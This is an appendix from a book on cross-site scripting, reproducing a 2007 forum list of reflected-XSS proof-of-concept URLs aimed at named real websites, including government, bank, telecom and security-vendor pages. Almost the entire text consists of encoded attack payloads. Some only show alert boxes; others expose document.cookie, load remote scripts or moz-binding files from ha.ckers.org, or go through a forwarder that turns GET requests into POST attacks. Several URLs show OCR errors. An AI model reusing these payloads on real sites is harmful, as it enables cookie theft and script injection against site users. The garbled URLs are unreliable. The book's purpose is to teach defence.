XSS Exploits: Cross Site Scripting Exploits and Defense
By Anton Rager

Appendix A: The Owned List

The following list was pulled from http://sla.ckers.org/forum/read.php?3,44,page=1 on March 2007 (may not work in all browsers). In instances where you see WhiteAcid.org, it is forwarding your request to the actual vulnerable website by converting GET requests into POST requests. This isn't every link; these arc only a handful of links that were found by the sh.ckers.org community. The best way to learn how XSS works it to see working examples, and these are a small slice of the existing vulnerabilities currently live on the web.

  • http://directory.gov.be/homme/top/category_id/%22%3E%3Cimg%20src=qsd%20onerror=alert(2006)%3E

  • www.homme.lycos.fr/hotbabes/categorie/%22%3E%3Cbody%20onload=alert(%22Blwood%22)%3E

  • www.serverspy.net/site/stats/mods.html?g=0%22%3E%3CSCRIPT%3Ealert(%22kefka%20was%20here%22)%3C/SCRIPT%3E

  • www.goblinworkshop.com/search2.html?s=%5C%22%3CSCRIPT%3Ealert%28%5C%22kefka%20was%20here%5C%22%29%3C%2FSCRIPT%3E%5C%22

  • www.uo.com/cgi-bin/search.pl?words='%3E%3Cscript%3Ealert(1337)%3C/script%3E%3Cb%20

  • http://blogshares.com/blogs.php?blog=%3Cscript%3Ealert(document.cookie)%3C/script%3E

  • www.rawstory.com/showarticle.php?src=%22%20onLoad=alert(document.cookie)%20x=%22

  • www.seq.org/outside.php?SITEURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

  • www.mindswap.org/rdf/instance/?inst=%3Cscript%3Ealert(document.cookie)%3C/script%3E

  • www.free-php.org/index.php?cat_select=%3Cscript%3Ealert(document.cookie)%3C/script%3E

  • www.php.com/include/search/index.php?where_keywords=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

  • http://actifpub.com/jump.php?sid=489&url=javascript%3Aalert%28document.cookie%29%3B

  • www.marketwatch.com/tools/marketsummary/default.asp?siteid=mktw%22%0aalert(%22asd%22)//

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.arto.com/brugere/login/default.asp?visopret=%26fc=0&destination=&returnUrl=&action=submit&brugernavn=%22%3E%3Cscript%3Ealert( xss )%3C/script%3E&kodeord=&xss_note=Basic%20XSS%20in%20the%20user-name%20field

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://userfriendly.org/cgi-bin/survey.cgi&personalemail=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

  • www.animenfo.com/search.php?query=%22%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cb+%22&queryin=anime_titles&action=Go&option=keywords

  • www.manga-news.com/recherche.php3?recherche=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

  • www.tokyopop.com/search.php?query=%22%3Cscript%3Ealert( XSS )%3C/script%3E%22

  • http://animefringe.com/search/index.php?REQ=%3Cscript%3Ealert( XSS )%3C/script%3E

  • www.darkhorse.com/search/search.php?frompage=userINPUT&sstring=maluc+%3CBODY+onload%3Dalert%28%22XSS%22%29%3E&match=any&scope=all&type=all&startmonth=all&startyear=all&endmonth=all&endyear=all&genre=all

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://us.yesasia.com/en/Search/SearchResult.aspx&asKeyword=%3Cscript%3Ealert( XSS )%3C/script%3E&asSectionID=allproducts&asIncludeOutOfStock=1&asShowAdult=0&mode=simplesearch

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.advfilms.com/search.asp&search=%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

  • www.totalvid.com/searchResultsBlinkx.cfm?blnFailed=1&strSearch=%3C/title%3E%3Cscript%3Ealert( XSS )%3C/script%3E

  • https://forums.there.com/forums/login.pl?redirect=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

  • http://proxy.perlproxy.com/p/000110A0000000/%3Cscript%3Ealert( XSS )%3C/script%3E

  • www.yousendit.com/resend_activate.php?email=shameless%20plug:%20%6D%61%6C%75%63%2E0/o73%69%74%65%73%6C%65%64%2E%63%6F%6D%22%20%3E%3Cscript%3Ealert( XSS )%3C/script%3E%3Cb%20

  • www.netdisaster.com/go.php?mode=cow&url=http://www.google.com/?%22onmouseover=alert(String.fromCharCode(88,83,83))%20;//

  • www.the-dma.org/cgi2/htsearch?config=the-dmahtdigwhole&restrict=&words='%3C/title%3E%3Cscript%3Ealert( XSS )%3C/script%3E%3Ctitle%3E&method=and

  • www.sciencemag.org/cgi/search?src=hw&site_area=sci&fulltext=%3C/title%3E%3Cscript%3Ealert( XSS )%3C/script%3E

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.exa.com.au/exasearch/index.php&s=foobar%3Cscript%3Ealert(document.cookie)%3C/script%3E

  • http://nbc.resultspage.com/search?ts=custom&p=Q&uid=&w=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

  • IE only: http://ha.ckers.org/expect.swf?http://www.beyondsecurity.com/

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://hacker.com/enter.asp&hacker=www.hacker.com&name=&address=&city=&state=&postal-code=&country=&phone=&email=&ofFer=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&comments=&Submit=Submit

  • www.independent.co.uk/search/simple.do?searchString=%3Cscript%3Ealert%28%27quack%27%29%3C%2Fscript%3E

  • http://docs.info.apple.com/article.html?artnum=1233';alert( Shiver%20me%20Timbers. );document.location= http://%6D%61%63-%73%75%63%6B%73.com ;a=%27

  • www.scmagazine.com/us/awards/voting/index.cfm?fuseaction=XCU.Awards.Voting.Vote&nSubCatID=26140&uCategoryUuid=401b5be2-9cee-4298-9da4-0eaa4bf82348&uNomineeUuid=58f3627d-70e4-4bd7-bc30-ab660cdbl7dd&sRandomString=66EDC001&checkCriteria_sName=You%20Are%20Voting%20On..%22%3E%3Cscript%3Ealert%28%22overblown%3F%21%22%29%3C%2Fscript%3E%3Cr%22&checkCriteria_sEmail=Best%20Web%20Filtering%20Solution&checkCriteria_bIsITProfessional=0&checkCriteria_bIsSubscriber=0&checkCriteria_bIsUSResident=0&checkCriteria_sCode=Ironic?&submit=submit

  • IE Only: http://ha.ckers.0rg/expect.swfthttp://www.hoovers.com/

  • http://preference.the-dma.org/cgi/optoutemps2.php?emaill=You+have+an+XSS+hole%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C%2Fscript%3E&email2=&email3=

  • www.comcast.net/signin.jsp?redirectUrl=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb

  • https://www.em.avnet.com/sts/home/0%2C11497%2CRID%3D0&CID%3D32209&CCD%3DUSA&SID%3D0&DID%3DDF2&LID%3D0&BID%3DDF2&CTP%3DSTS%2C00.html?ACD=1&UID='%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

  • http://goonline.seeq.com/seeq/int_results.jsp?portal_id=1&domain=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&tag=fdsa&keyword=blah

  • http://search.comcast.net/?q=%3Cscript+src%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2Fscript%3E&cat=Images&con=net&x=0&y=0

  • http://www22.verizon.com/Search/Resuhs/?SearchText=%27+style%3D-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29+onmouseover%3D%27alert%28%22XSS%22%29%27+b&x=14&y=10&box=1&QueryText=%27+style%3D-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29+onmouseover%3D%27alert%28%22XSS%22%29%27+b&Coll1=1&Co1l=Enterprise%2C+Federal%2C+Wholesale%2C+Corporate+Information%2C+LearningCorner&Co112=home_products%2C+home_support%2C+business_products%2C+business_support&site=&ps=1&om=1&cs=1&checkall=&resultspage=firstpage&lKesultStart=1&ResultCount=3&statechoice=ALL&cmd=new&kb=&from-1

  • http://search.about.com/fullsearch.htm?terms=%22%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=https://business.verizonwireless.com/b2b/jsp/popups/optin.jsp&email=xss'%3E%3Cscript%3Ealert( XSS )%3C/script%3E%3Cb%20

  • http://wwwl.sprintpcs.com/learn/form_public_question.jsp?bmForm=sendEmail&bmFormID=1159089875101&bmUID=1159089875101&bmIsForm=true&bmPrevTemplate=learn%2Fform_public_question.jsp&bmText=EMAIL_QUESTION%3C%3EfName&bmRequired=EMAIL_QUESTION%3C%3EfName&EMAIL_QUESTION%3C%3EfName=&bmText=EMAIL_QUESTION%3C%3ElName&bmRequired=EMAIL_QUESTION%3C%3ElName&EMAIL_QUESTION%3C%3ElName=&bmText=EMAIL_QUESTION%3C%3EcontactNo&bmRequired=EMAIL_QUESTION%3C%3EcontactNo&EMAIL_QUESTION%3C%3EcontactNo=&bmText=EMAIL_QUESTION%3C%3EemailUs&bmRequired=EMAIL_QUESTION%3C%3EemailUs&EMAIL_QUESTION%3C%3EemailUs=&bmSingle=EMAIL_QUESTION%3C%3Etopic&EMAIL_QUESTION%3C%3Etopic=&bmText=EMAIL_QUESTION%3C%3Etext_area&EMAIL_QUESTION%3C%3Etext_area=XSS+Goes+Here%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&bmText=charCountMeter&charCountMeter=1147&bmlmage=submit.x&bmlmage=submit.y&submit.x=33&submit.y=12&bmFields=bmForm%2CbmFormID%2CbmUID%2CbmIsForm%2CbmPrevTemplate%2CbmText%2CbmRequired%2CbmSingle%2CbmImage&bmHash=bfdeb512638bba6615437a7e4aacdbd04e5ae756

  • www.vodafone.com/site_search_results/0,3062,CATEGORY_ID%253D200%2526LANGUAGE_ID%253D0%2526CONTENT_ID%253D0,00.html?section=all&company=all&KWD=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cb+&submitButton=%C2%BB

  • http://buscador.telefonica.es/jsp/index.jsp?QUERYSTRING=&NOMLIB=telefonica%7Ctelefonicacom%7Cgrupo_telefonicaonline%7Cgrupo_Telefonicamoviles%7Cgrupo_telefonicadata%7Cgrupo_telefonicamedia%7Cgrupo_cabitel%7Cgrupo_fundaciontelefonica%7Cgrupo_telefonicaid%7Cgrupo_telefonicacable%7Cgrupo_terra%7C&QUERYTYPE=1&QUERYLEVEL=2&DOFRAME=YES&NRE-SULT=10&PAG=DORESULT&PAGINA=0&FILEINI=&SALADEPRENSA=&IDIOM=&QUERYTXT=a'%3E%3Cscript%3Ealert( XSS );%3C/script%3E%3Cb

  • www.telecomitalia.com/cgi-bin/tiportale/TIPortale/ep/invalidSession.jsp?channelId=-8661&LANG=EN&string=a%22%3e%3c%2fiframe%3e%3cscript%3ealert(%22XSS%22)%3c%2fscript%3e%3cb&tabId=0&encoding=UTF-8&programId=27833&pageTypeId=9535&saveResults=true&saveResults=true&Submit=&lang=ENGLISH&Failed_Reason=No+BVCookie+present+to+retrieve+the+session.&logDebug=true&programPage=%252Fep%252Fcommon%252FsearchResult.jsp&com.broadvision.session.new=Yes&indexName=TELECOM&Failed_Page=%2fTIPortale%2fep%2fprogramViewdo&abstractLength=300&startSet=1&hitsPerSet=10&BV_UseBVCookie=No

  • www.mapquest.com/maps/map.adp?cat=%22%2F%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fweird%2Fstallowned.js%3E%3C%2Fscript

  • www.information.com/search/index.html?cat=1&keyword=%22%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.telenor.com.pk/careers/Jobs.php?&CV_ID=XSS%27%3C&password=a%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&Submit2=++Sign+In++

  • www.teliadk.idlesurf.net/cgi-bin/search.pl?lang_intrf=da&query=asdf%27%3Balert%28%27XSS%27%29%3Bt+%3D%27&x=0&y=0&qtype=and

  • http://192.89.232.139/jobs/frmAdSearch.asp?JOBCITY=&JOBUNIT=&JOB-TYPE=&JOBFUN=&JOBFUN_SUB=&JOBFUNCTION=&FREE_TEXT=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cb+&JOBSORT=AD_EXT_CDATE&TOP_10=0&L=1

  • http://se.ext.telia.newjobs.com/login.asp?redirect=h%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb%20

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://home.singtel.com/customer_service/cust_serv_emailus.asp&salutation_=&name_=XSSl%22%3E%3Cscript%3Ealert(%22XSSl%22)%3C/script%3E%3Cb%20&nature_of_feedback_=&contact_number_=XSS2%22%3E%3Cscript%3Ealert(%22XSS2%22)%3C/script%3E%3Cb%20&email_=XSS3%22%3E%3Cscript%3Ealert(%22XSS3%22)%3C/script%3E%3Cb%20&commenting_on_=&your_comments_=XSS4%3C/textarea%3E%3Cscript%3Ealert(%22XSS4%22)%3C/script%3E

  • www.codemasters.com/search/index.php?search_string=%22%3C/title%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E%3Cstyle%3E&sub-mitsearch=true&submitsearch_x=0&submitsearch_y=0&territory=EnglishUSA

  • www.cbs.com/excedrin/register.php?mpid=2691&success_page=thankyou.php&action=create&login=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&password=&password2=&firstname=&lastname=&addressl=&city=&state=&zip=&country=&birthdate=%2F%2F&birthmonth=&birthday=&birthyear=&phone=&email=&previous_email=&ireadtherules=&Submit=Submit

  • http://rzr.online.fr/docs/search/redir.php?url=a%3C/title%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

  • www.nscp.org/cgi-bin/leave.pl?redir=google.com/%3Cscript%3Ealert( XSS )%3C/script%3E

  • www.dmas.virginia.gov/pr-provider_no.asp?redir=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb

  • www.innovations.va.gov/innovations/docs/notva.cfm?redir=');%7Dalert( XSS );if(1==0)%7B//

  • http://robotics.nasa.gov/rcc/redirect.php?url=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3C/b

  • www.opic.gov/leaving.asp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C/b

  • http://columbiaredi.com/redirect.php?url='%20onmouseover=alert( XSS )%20style='-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)%27

  • www.dotcr.ost.dot.gov/asp/redirect.asp?url=zomg%20XSS%3Cscript%3Ealert( XSS )%3C/script%3E

  • www.freeml.com/servlet/redir?rd=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com

  • https://www.alipay.com/user/user_register.htm?support=000000&_fmu.u._0.e=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&_finu.u._0.e=&_fmu.u._0.q=&_fmu.u._0.qu=&_fmu.u._0.pa=&_fmu.u._0.pay=&_fmu.u._0.p=%CE%D2%B0%D6%B0%D6%C2%E8%C2%E8%B5%C4%C3%FB%D7%D6%B8%F7%CA%C7%CA%B2%C3%B4&_fmu.u._0.o=&_fmu.u._0.pr=&_fmu.u._0.u=2&_fmu.u._0.f=&_fmu.u._0.r=&_fmu.u._0.ca=%C9%ED%B7%DD%D6%A4&_fmu.u._0.car=&_fmu.u._0.c=&_fmu.u._0.re=alipay&action=register_action&event_submit_do_register=anything&Submit=%CD%AC%D2%E2%D2%D4%CF%C2%CC%F5%BF%EE%A3%AC%B2%A2%C8%B7%C8%CF%D7%A2%B2%E1

  • https://www.wamuhomeloans.com/cgi-bin/mqinterconnect.cgi?link=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

  • www.hbo.com/scripts/video/vidplayer_set.html?movie=/av/events/psa/ncta_psa+section=events+num=1115404066482+title=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%20PSA:%20%22From%20A%20Distance%22:%20Visit%20www.controlyourtv.org+tunein=

  • www.hemnet.se/bevakning/BevLogin.asp?service=hemnet&type=bev&action=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&username=&email=&reklam=N&htmlmail=N&error=-2&

  • IE only: http://ha.ckers.org/expect.swf?http://www.ericsson.se

  • www.beliefnet.com/search/search_site_results.asp?search_for=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&to_search=whole_site

  • www.ddj.com/TechSearch/not_found.jhtml;jsessionid=lBKYW43EIVWIKQS-NDLRCKH0CJUNN2JVN?nftype=error&queryText=%22;alert(%22XSS%22);%22&site_id=3600005&_requestid=190824

  • www.techworld.com/search/index.cfm?fuseaction=dosearch&thecriteria=asdf%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%3Cb+%22&Search=SEARCH&search_networking=1&search_storage=1&search_secu-rity=1&search_mobility=1&search_applications=1&search_opsys=1&search_mid-sizedbusiness=1&search_news=1&search_reviews=1&search_blogs=1&search_whitepapers=1&search_insight=1&search_casestudies=1&search_howto=1&search_brief-ings=1&search_interviews=1

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://news.com.com/2113-1038_3-6119515.html&toEmailAddress=%22%3E%.3Cscript%3Ealert( XSS )%3C/script%3E

  • www.digitmag.co.uk/search/index.cfm?fuseaction=dosearch&thecriteria=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Search=Go&search_news=1&search_blogs=1&search_reviews=1&search_features=1

  • www.startrek.com/startrek/view/search/result.html?type=article&search=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&category=

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.gm.com/Scripts/SearchServer.exe&query=%22%3E%3Cscript%3Ealert( ! );%3C/script%3E&method=mainQuery&Submit=Submit

  • http://validator.opml.org/?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%22

  • http://megalodon.jp/?url=http%3A%2F%2F%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

  • www.latimes.com/search/dispatcher.front?target=blendedsearch&Query=%22%3B%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E

  • www.navair.navy.mil/pke_popup.cfm?app=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

  • www.caltex.com/corp/en/Search.asp?qSearchText=Where%20Could%20It%20Be%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb%20a=%22

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.f5.com/f5/contact.php&name=XSS+here%3Cscript+src%3Dhttp://ha.ckers.org/s.js%3E%3C/script%3E&areacode=&phone=&phoneExt=®ion=&howtocontact=phone&action=Submit

  • http://query.nytimes.com/search/query?frow=0&n=10&srcht=s&query=asdf%27%3Balert%28%27XSS%27%29%3Bx+%3D%27&srchst=nyt&submit.x=0&submit.y=0&submit=sub&hdlquery=&bylquery=&daterange=full&monl=01&dayl=01&yearl=1981&mon2=09&day2=27&year2=2006

  • http://search.forbes.com/search/find?MT=%22%3E%3Cscript%3Ealert( XSS );%3C/script%3E&sort=&aname=&author=&date=&pub=forbes.com%2Cmagazine%2Cglobal%2Cfyi%2Casap%2Cbest%2Cbow%2Cap%2Cpinnacor%2Cafx

  • http://search.sky.com/search/skynews/results?QUERY=%22%3E%3Cscript%3Ealert( XSS )%3C/script%3E&CID=30000&Submit.x=0&Submit.y=0

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www-5.jeep.com:80/searchapp/ui.jsp&ui_mode=question&charset=UTF-8&language=en-US&brandSite=jeep&prior_transaction_id=10602&question_box=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22

  • https://support.opera.com/bin/customer?action=sendPassword&email=GetFireFox%22%3E%3Cscript%3Ealert%28%22Get+FireFox%22%29%3Bdocument.write+%28%27%3CMETA+HTTP-EQUIV%3D%22refresh%22+content%3D%220%3BURL%3Dhttp%3A%2F%2Fwww.getfirefox.net%2F%22%3E%27%29%3B%3C%2Fscript%3E%3Cx+x%3D%22&ok=OK

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.chevrolet.com/search/SearchServer/wwwtemplates/index.jsp&query=%22%3E%3C%2Fiframe%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=33&y=9

  • www.gm.com/Scripts/SearchServer.exe?query=%22%3E%3Cscript%3Ealert( ! );%3C/script%3E&method=mainQuery&Submit=Submit

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.f5.com/f5/contact.php&name=XSS+here%3Cscript+src%3Dhttp://ha.ckers.org/s.js%3E%3C/script%3E&areacode=&phone=&phoneExt=®ion=&howtocontact=phone&action=Submit

  • http://webcenters.netscape.compuserve.com/celebrity/results.jsp?floc=ce-main-2-ll&q=a-%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&searchType=photosearch&x=0&y=0

  • http://search.lexmark.com/searchresults.shtml?query=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&x=44&y=16

  • http://search.ati.com/nasearch.asp?Query=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&go.x=14&go.y=15&DefaultLanguage=16&Catalog=NASite&rdoCatalog=NASite&Start=&Total=&Stat=New

  • www.hooters.com/news_and_events/calendar/index.asp?req_event=&req_state=asdf%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20x=%22&submit=Search&c_date=&req_yr=

  • www.xfxforce.com/web/search.jspa?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&searchIn=gamersCentral&searchIn=support&searchIn=product&searchIn=news&searchIn=feature

  • http://castle.pricewatch.com/s/search.asp?s=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

  • www.sonystyle.com/is-bin/INTERSHOP.enfmity/eTS/Store/en/-/USD/SY_Email_Subscription-Create?source=LC&mailpref=Y&email=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%40yahoo.com

  • www.mouser.com/search/Refine.aspx?Ne=l447464+254016&Ntt=*%3e%3cscript%3ealertXSS%3cscript%3e*&Ntx=mode%2bmatchall&Mkw=%22%3e%3cscript%3ealert( XSS )%3c%2fscript%3e&N=1323038&Ntk=Mouser_Wildcards

  • www.jameco.com/webapp/wcs/stores/servlet/CatalogSearchResultView?langId=-1&storeId=10001&catalogId=10001&searchValue=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&searchType=m

  • http://search.gifts.com/?q=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&x=26&y=6

  • http://search.gifts.com/?q=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&x=26&y=6

  • www.gamerankings.com/itemrankings/Itemsearch.asp?Itemname=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&extsearch=0

  • www.linuxdevices.com/cgi-bin/search_view.cgi?snews=checked&sarticle=checked&sk=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&st=all&view=Search&ss=newest

  • www.travelport.com/en/search/index.cfm?qt=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

  • http://shops.ancestry.com/searchresultslist.asp?searchstring=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

  • http://search.ittoolbox.com/default.asp?r=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&Submitl=Search

  • www.gesecurity.com/portal/site/GESecurity/template.PAGE/menuitem.5618f8037e6d3a0c8e6e9510c4030730/?javax.portlet.tpst=2080500dld974fba0c39142cc4030730&javax.portlet.prp_2080500dld974fba0c39142cc4030730_viewID=MY_PORTAL_VIEW&javax.portlet.begCacheTok=token&javax.portlet.endCacheTok=token&withmQueryl=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

  • www.whitearid.org/misc/xss_post_forwarder.php?xss_target=http://www.safer-networking.org/index.php?page=search&lang=en&submit=&quickquery=%22%2F%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&submit.x=0&submit.y=0&submit=%3E

  • www.nasdaq.com/portfolio/ptform2.asp?site=&sitesubtype=&email=%22%3E%3Cscript%3Ealert(%22XSS%o22)%3C/script%3E&name=&submit=Submit

  • www.borsaitaliana.it/bitApp/login.bit?username=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&password=&submit.x=26&submit.y=14

  • www.amex.com/quickquote/error.jsp?fldMessage=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

  • www.asx.com.au/asx/about/Feedback.jsp?referred='-%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

  • www.hummingbird.com/SEARCH/search.html?searchText=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&searchType=Basic&Search.x=0&Search.y=0&Search=Search&cks=y

  • http://morpheus.com/contact.asp?ref=%22%3E%3Cscript%3Ealert( XSS )%3C/script%3E

  • http://sales.limewire.com/support/pro_lookup.php?payer_email=%3Cscript%20src=http://ha.ckers.org/xss.jpg

  • www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert( XSS )%3C/script%3E&neighborhood=none

  • www.thawte.com/ucgi/search.cgi?menul=make+your+selection+%3E%3E&Search=%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg+&x=3&y=5

  • www.certicom.com/index.php?keywords=asdf%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cx+&Submit=Submit&action=res%2Csearch_site

  • http://search4.unisys.com/especific/search_results.asp?qstr=asdf%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+&totDocs=0&totFtDocs=0&qryoption=allofthewords&extension=&changeDisplay=0&qstrTemp=asdf%27e&SiteToSearch=http%3A%2F%2Fwww.unisys.com%2Fabout_unisys%2F*§ion=&Search=Search&summ=detailed&docsPP=20&s=&se=&b=aboutunisys&p=3&e=none&sf=corporate&ci=about_unisys&ce=company_profile

  • http://app.subscribermail.com/add_mail.cfm?optinparam=redirectwelcome&ovr_redirection_url=http%3A%2F%2Fwww.trustestage.com%2Fsubconfirm.html&ppid=T1KUSD6C93DDB&version=v3&email=XSS%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg+&mailtype=1&Submit=Submit

  • www.afpc.randolph.af.mil/external.asp?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

  • http://ohrm.os.doc.gov/search/index.htm?ssUserText=Osama+Bin+Laden%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+

  • http://search.access.gpo.gov/GPO/Search.asp?ct=GPO&ql=Weapons%20of%20Mass%20Destruction%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

  • www.compusa.com/products/products.asp?N=0&Ntt=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cx%20&Ntk=All&Nty-1&D=XSSman%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cx%20&Dx=mode%20matchall

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http //www.tech-powerup.org/upload.php&MAX_FILE_SIZE=2097152&file=&url=http//asdf%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&resize=0&dx=0&dy=0&watermark=9&tagline=&font=arial&textcol=%2523000000&size-12&bgcol=%2523FFFFFF&bgalpha=20&tagpos-1

  • www.frozencpu.com/process?mv_session_id=tdVJ23D9&mv_nextpage=problem&mv_form_profile=check_problem&mv_todo=return&p_fname=XSSman+for+fP/o22+style%3D-moz-binding%3Aurl%28%22http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%22%29&p_lname=XSSman+for+ie%22+style%3D%27xx%3Aexpression%28alert%28%22XSS%22%29%29%27&p_email=&p_subject=&p_category=general&p_comments=%OD%OA&mv_click_map=Send&mv_click_Send=Send

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://odds.proboards24.com/index.cgi?action=register2&username=%22%3E%3Cscript%3Ealert( XSS )%3C/script%3E

  • https://knowledge.mcafee.com/SupportSite/search.do?languages=XSSman'%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20&rwTarget=%2FrfPlayerWidget.do&searchMode=GuidedSearch&searchString=&product=hhhhh&document=&cmd=search&productFamily=&contextType=gs

  • www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://reg.imageshack.us/content.php?page=email&name=Null&email=XSS%22%3E%3Cscript%20src%3Dhttp://ha.ckers.org/xss.jpg%20@null.org&subj=XML+API+Request&corresp=Partnerships&idea=Null&ip=0.0.0.0&q=marketing

  • http://usa.kaspersky-labs.com/trials/trialsregHOME.php?aw=Trials+Page&ref=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx%20&chapter=146481750

  • www.adidas.com/us/shared/legal.asp?strCountry=us&strBrand=%22);alert(%22XSS%22)%3C/SCRIPT%3E%3Cx

  • http://livesupport.bitdefender.ro/request.php?1=admin&x=1&deptid=1&page=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%3Cx=%20

  • https://shop.pandasoftware.com/entrada.aspx?idioma=en-us&returnUrl=%22);%7D%7D%20alert(%22XSS%22);%7B%7Bx=eval(%22

